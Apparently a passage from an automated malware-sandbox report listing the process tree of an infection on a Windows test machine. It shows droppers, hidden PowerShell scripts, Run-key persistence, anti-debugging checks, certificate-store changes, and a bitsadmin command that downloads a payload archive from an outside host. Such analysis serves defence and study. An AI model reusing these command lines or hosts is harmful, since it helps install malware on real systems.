                                                                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0s3mtotr.bbu\GcleanerEU.exe /eufive & exit
                                                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                                                  PID:4512
                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\0s3mtotr.bbu\GcleanerEU.exe
                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\0s3mtotr.bbu\GcleanerEU.exe /eufive
                                                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                                                      PID:5096
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 5096 -s 256
                                                                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                                                                        • Program crash
                                                                                                                                                                                                                                                        • Checks processor information in registry
                                                                                                                                                                                                                                                        • Enumerates system info in registry
                                                                                                                                                                                                                                                        PID:1732
                                                                                                                                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\bolq5rd2.acr\installer.exe /qn CAMPAIGN="654" & exit
                                                                                                                                                                                                                                                    6⤵
                                                                                                                                                                                                                                                      PID:5304
                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\bolq5rd2.acr\installer.exe
                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\bolq5rd2.acr\installer.exe /qn CAMPAIGN="654"
                                                                                                                                                                                                                                                        7⤵
                                                                                                                                                                                                                                                          PID:4728
                                                                                                                                                                                                                                                      • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\htsztrok.1r2\any.exe & exit
                                                                                                                                                                                                                                                        6⤵
                                                                                                                                                                                                                                                          PID:4820
                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\htsztrok.1r2\any.exe
                                                                                                                                                                                                                                                            C:\Users\Admin\AppData\Local\Temp\htsztrok.1r2\any.exe
                                                                                                                                                                                                                                                            7⤵
                                                                                                                                                                                                                                                              PID:6024
                                                                                                                                                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\1losbnuw.fhl\gcleaner.exe /mixfive & exit
                                                                                                                                                                                                                                                            6⤵
                                                                                                                                                                                                                                                              PID:4052
                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\1losbnuw.fhl\gcleaner.exe
                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\1losbnuw.fhl\gcleaner.exe /mixfive
                                                                                                                                                                                                                                                                7⤵
                                                                                                                                                                                                                                                                  PID:6420
                                                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 6420 -s 256
                                                                                                                                                                                                                                                                    8⤵
                                                                                                                                                                                                                                                                    • Program crash
                                                                                                                                                                                                                                                                    • Checks processor information in registry
                                                                                                                                                                                                                                                                    • Enumerates system info in registry
                                                                                                                                                                                                                                                                    PID:6808
                                                                                                                                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\zygfemy3.b21\autosubplayer.exe /S & exit
                                                                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                                                                  PID:6792
                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\zygfemy3.b21\autosubplayer.exe
                                                                                                                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\zygfemy3.b21\autosubplayer.exe /S
                                                                                                                                                                                                                                                                    7⤵
                                                                                                                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                                                                                                                    • Drops file in Program Files directory
                                                                                                                                                                                                                                                                    PID:6140
                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nstF89D.tmp\tempfile.ps1"
                                                                                                                                                                                                                                                                      8⤵
                                                                                                                                                                                                                                                                        PID:6224
                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nstF89D.tmp\tempfile.ps1"
                                                                                                                                                                                                                                                                        8⤵
                                                                                                                                                                                                                                                                          PID:7132
                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nstF89D.tmp\tempfile.ps1"
                                                                                                                                                                                                                                                                          8⤵
                                                                                                                                                                                                                                                                            PID:2284
                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nstF89D.tmp\tempfile.ps1"
                                                                                                                                                                                                                                                                            8⤵
                                                                                                                                                                                                                                                                              PID:3328
                                                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nstF89D.tmp\tempfile.ps1"
                                                                                                                                                                                                                                                                              8⤵
                                                                                                                                                                                                                                                                                PID:6888
                                                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nstF89D.tmp\tempfile.ps1"
                                                                                                                                                                                                                                                                                8⤵
                                                                                                                                                                                                                                                                                  PID:4552
                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nstF89D.tmp\tempfile.ps1"
                                                                                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                                                                                  • Checks for any installed AV software in registry
                                                                                                                                                                                                                                                                                  PID:3888
                                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                                                                                                                                                                  "bitsadmin" /Transfer helper http://fscloud.su/data/data.7z C:\zip.7z
                                                                                                                                                                                                                                                                                  8⤵
                                                                                                                                                                                                                                                                                  • Download via BitsAdmin
                                                                                                                                                                                                                                                                                  PID:4424
                                                                                                                                                                                                                                                                                  • C:\Windows\System32\Conhost.exe
                                                                                                                                                                                                                                                                                    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                    9⤵
                                                                                                                                                                                                                                                                                      PID:5996
                                                                                                                                                                                                                                                                      • C:\Users\Admin\Pictures\Adobe Films\n4B2euMVLh0bciK4wmLM5Ln_.exe
                                                                                                                                                                                                                                                                        "C:\Users\Admin\Pictures\Adobe Films\n4B2euMVLh0bciK4wmLM5Ln_.exe"
                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                        PID:4804
                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\4151360.exe
                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\4151360.exe"
                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                                                          PID:2600
                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\6948140.exe
                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\6948140.exe"
                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                                                          PID:6136
                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\7968681.exe
                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\7968681.exe"
                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                                                          • Checks BIOS information in registry
                                                                                                                                                                                                                                                                          • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                          PID:5156
                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\2794099.exe
                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\2794099.exe"
                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                                                          • Checks BIOS information in registry
                                                                                                                                                                                                                                                                          • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                          PID:6120
                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\294455.exe
                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\294455.exe"
                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                                                          • Adds Run key to start application
                                                                                                                                                                                                                                                                          PID:984
                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                                                                                                            PID:4804
                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\8882655.exe
                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\8882655.exe"
                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                                                          PID:3296
                                                                                                                                                                                                                                                                      • C:\Users\Admin\Pictures\Adobe Films\kxf1nN_BO3OQXSHBdwGCWokI.exe
                                                                                                                                                                                                                                                                        "C:\Users\Admin\Pictures\Adobe Films\kxf1nN_BO3OQXSHBdwGCWokI.exe"
                                                                                                                                                                                                                                                                        2⤵
                                                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                                                                                                                        PID:5024
                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Calculator\setup.exe
                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=1
                                                                                                                                                                                                                                                                          3⤵
                                                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                                                                                                                          • Adds Run key to start application
                                                                                                                                                                                                                                                                          PID:6076
                                                                                                                                                                                                                                                                          • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                                                                                            "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--loGQqfG2tg"
                                                                                                                                                                                                                                                                            4⤵
                                                                                                                                                                                                                                                                            • Loads dropped DLL
                                                                                                                                                                                                                                                                            • Suspicious use of FindShellTrayWindow
                                                                                                                                                                                                                                                                            PID:7152
                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                                                                                              C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x204,0x208,0x20c,0x1e0,0x210,0x7fffd258dec0,0x7fffd258ded0,0x7fffd258dee0
                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                                                                                                                                              PID:1100
                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                                                                                                C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x13c,0x140,0x144,0x118,0x148,0x7ff60b0a9e70,0x7ff60b0a9e80,0x7ff60b0a9e90
                                                                                                                                                                                                                                                                                6⤵
                                                                                                                                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                                                                                                                                PID:6316
                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1604,6389185327863465922,12355533289377355959,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7152_1696692309" --mojo-platform-channel-handle=1752 /prefetch:8
                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                              • Loads dropped DLL
                                                                                                                                                                                                                                                                              • Modifies system certificate store
                                                                                                                                                                                                                                                                              PID:5148
                                                                                                                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1604,6389185327863465922,12355533289377355959,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7152_1696692309" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1616 /prefetch:2
                                                                                                                                                                                                                                                                              5⤵
                                                                                                                                                                                                                                                                                PID:1164
                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1604,6389185327863465922,12355533289377355959,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7152_1696692309" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --mojo-platform-channel-handle=2620 /prefetch:1
                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                                                                                                                                PID:1280
                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1604,6389185327863465922,12355533289377355959,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7152_1696692309" --mojo-platform-channel-handle=2412 /prefetch:8
                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                                                                                                                                PID:3976
                                                                                                                                                                                                                                                                              • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                                                                                                "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1604,6389185327863465922,12355533289377355959,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7152_1696692309" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2628 /prefetch:1
                                                                                                                                                                                                                                                                                5⤵
                                                                                                                                                                                                                                                                                  PID:3160
                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1604,6389185327863465922,12355533289377355959,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7152_1696692309" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3312 /prefetch:2
                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                  • Modifies registry class
                                                                                                                                                                                                                                                                                  PID:6668
                                                                                                                                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1604,6389185327863465922,12355533289377355959,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7152_1696692309" --mojo-platform-channel-handle=3328 /prefetch:8
                                                                                                                                                                                                                                                                                  5⤵
                                                                                                                                                                                                                                                                                    PID:4736
                                                                                                                                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1604,6389185327863465922,12355533289377355959,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7152_1696692309" --mojo-platform-channel-handle=3272 /prefetch:8
                                                                                                                                                                                                                                                                                    5⤵
                                                                                                                                                                                                                                                                                      PID:6176
                                                                                                                                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                                                                                                      "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1604,6389185327863465922,12355533289377355959,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7152_1696692309" --mojo-platform-channel-handle=3812 /prefetch:8
                                                                                                                                                                                                                                                                                      5⤵
                                                                                                                                                                                                                                                                                        PID:2572
                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1604,6389185327863465922,12355533289377355959,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7152_1696692309" --mojo-platform-channel-handle=3652 /prefetch:8
                                                                                                                                                                                                                                                                                        5⤵
                                                                                                                                                                                                                                                                                          PID:6468
                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1604,6389185327863465922,12355533289377355959,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw7152_1696692309" --mojo-platform-channel-handle=2728 /prefetch:8
                                                                                                                                                                                                                                                                                          5⤵
                                                                                                                                                                                                                                                                                            PID:6876
                                                                                                                                                                                                                                                                                  • C:\Windows\System32\WaaSMedicAgent.exe
                                                                                                                                                                                                                                                                                    C:\Windows\System32\WaaSMedicAgent.exe cc6c8b923930ed971de306e7d61c01b5 daOiKgVPfUaRwyNH+IbtQg.0.1.0.3.0
                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                    • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                                    PID:3668
                                                                                                                                                                                                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                    • Drops file in Windows directory
                                                                                                                                                                                                                                                                                    • Modifies data under HKEY_USERS
                                                                                                                                                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                    PID:1808
                                                                                                                                                                                                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                                                                                                                                                                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
                                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                                    • Checks processor information in registry
                                                                                                                                                                                                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                                                                                                                                    • Suspicious use of WriteProcessMemory
                                                                                                                                                                                                                                                                                    PID:2068
                                                                                                                                                                                                                                                                                    • C:\Windows\uus\AMD64\MoUsoCoreWorker.exe
                                                                                                                                                                                                                                                                                      C:\Windows\uus\AMD64\MoUsoCoreWorker.exe
                                                                                                                                                                                                                                                                                      2⤵
                                                                                                                                                                                                                                                                                        PID:1528
                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 448 -p 2444 -ip 2444
                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                      • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                      PID:2960
                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 4388 -ip 4388
                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                      • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                      PID:768
                                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 1416 -ip 1416
                                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                                        PID:2180
                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 2696 -ip 2696
                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                        • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                        PID:3036
                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 3480 -ip 3480
                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                        • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                        PID:5836
                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 3696 -ip 3696
                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                        • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                        PID:5916
                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 5412 -ip 5412
                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                        • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                        PID:3532
                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\D93A.exe
                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\D93A.exe
                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                                                                                                                                                                                        PID:3020
                                                                                                                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\D93A.exe
                                                                                                                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\D93A.exe
                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                                                                                                                          • Checks SCSI registry key(s)
                                                                                                                                                                                                                                                                                          • Suspicious behavior: MapViewOfSection
                                                                                                                                                                                                                                                                                          PID:1872
                                                                                                                                                                                                                                                                                      • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                                                                                        rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                        • Process spawned unexpected child process
                                                                                                                                                                                                                                                                                        PID:4676
                                                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                          rundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global
                                                                                                                                                                                                                                                                                          2⤵
                                                                                                                                                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                                                                                                                                                          PID:768
                                                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 768 -s 456
                                                                                                                                                                                                                                                                                            3⤵
                                                                                                                                                                                                                                                                                            • Program crash
                                                                                                                                                                                                                                                                                            • Checks processor information in registry
                                                                                                                                                                                                                                                                                            • Enumerates system info in registry
                                                                                                                                                                                                                                                                                            PID:4596
                                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\1E33.exe
                                                                                                                                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\1E33.exe
                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                                                                                                                        • Checks BIOS information in registry
                                                                                                                                                                                                                                                                                        • Checks whether UAC is enabled
                                                                                                                                                                                                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                                                                                                                                        PID:4332
                                                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 768 -ip 768
                                                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                                                        • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                                                                                                                                                                                                                        • Checks processor information in registry
